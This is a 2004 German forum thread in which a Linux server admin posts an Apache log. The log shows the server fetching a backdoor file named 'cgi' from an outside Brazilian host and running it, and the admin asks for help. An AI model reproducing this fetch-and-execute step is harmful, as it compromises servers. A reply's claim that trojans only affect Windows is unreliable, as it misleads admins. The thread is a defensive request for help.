PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Problem mit Apache



Stone
18.04.2004, 07:47
Hallo,

Folgendes Problem habe ich schon seit einigen Wochen. ICh habe einen Fedora Core 1 Linux Server mit Appache 2.0.48, my SQL und PHP installiert.

Jedoch stellte ich folgendes fest. Aus einem mir nicht ganz ersichtlichen Grund steht plötlich im error.log File des Apache folgender Eintrag:


script not found or unable to stat
script not found or unable to stat
--22:30:20-- http://www.poerschke.hpg.com.br/cgi
=> `cgi'
Resolving www.poerschke.hpg.com.br... done.
Connecting to www.poerschke.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.poerschke.hpg.ig.com.br/cgi [following]
--22:30:21-- http://www.poerschke.hpg.ig.com.br/cgi
=> `cgi'
Resolving www.poerschke.hpg.ig.com.br... done.
Connecting to www.poerschke.hpg.ig.com.br[200.226.137.12]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10,403 [text/plain]

0K .......... 100% 17.49 KB/s

22:30:23 (17.49 KB/s) - `cgi' saved [10403/10403]


Der Apache startet dann einen Prozess ./CGI
Ich lösche den Prozess immer und entlerre Sicherheitshalber das /tmp Verzeichnis.
Meine Frage. Weis jemand was das ist? Ich vermute jemand versucht einen Trojaner zu installieren!. Wenn ich da recht habe, wie kann ich mich dagegen schützen, bzw. wie muss ich den Apache Server konfigurieren, das der Apache nicht mehr das CGI File runterlädt

Andreas

h75
18.04.2004, 08:42
Also ich würde jetzt, da Apache 2.x noch nicht viele unterstützen, das es daran liegt. Denn viele Softwarekomponenten funkionieren damit noch nicht.

Gehört denn die Domain www.poerschke.hpg.ig.com.br/cgi dir?? oder ist die dir unbekannt? Ist das nicht die domainendung von brasilien?

natürlich ist es auch möglich, das das jemand einen trojaner installiert, aber dann auch nur unter Windows... Welches System hast du denn?

Stone
18.04.2004, 18:46
Also ich würde jetzt, da Apache 2.x noch nicht viele unterstützen, das es daran liegt. Denn viele Softwarekomponenten funkionieren damit noch nicht.

Gehört denn die Domain www.poerschke.hpg.ig.com.br/cgi dir?? oder ist die dir unbekannt? Ist das nicht die domainendung von brasilien?

natürlich ist es auch möglich, das das jemand einen trojaner installiert, aber dann auch nur unter Windows... Welches System hast du denn?

Also die Domain ist mir unbekannt. Du hats recht die seite liegt in Brasilien.
Ich verwende Fedora Core1 Linux (nachfolger von Red Hat).
Das Problem ist das laut log File der Apache Server von selbst beginnt auf diese Adresse zuzugreifen. Er lädt dan ein File namens cgi ins tmp. Danach wird mit dem Appache ein weiterer Prozess gestartet jedoch mit dem verweis ./CGI. Mich würde interessieren woduch wird der Apache Server dazu veranlasst eine Abfrage auf diese Adress zu starten. Wenn man auf die Adresse nach Basilien geht und sich das CGI File auf seinen Rechner (windows) lädt, schreit der McAfee das es sich um einen Linux/pathi handelt.
Also meine Ich das es sich definitiv um einen Backdor Virus handelt. Die frage stellt sich nur wie verhindere ich das!!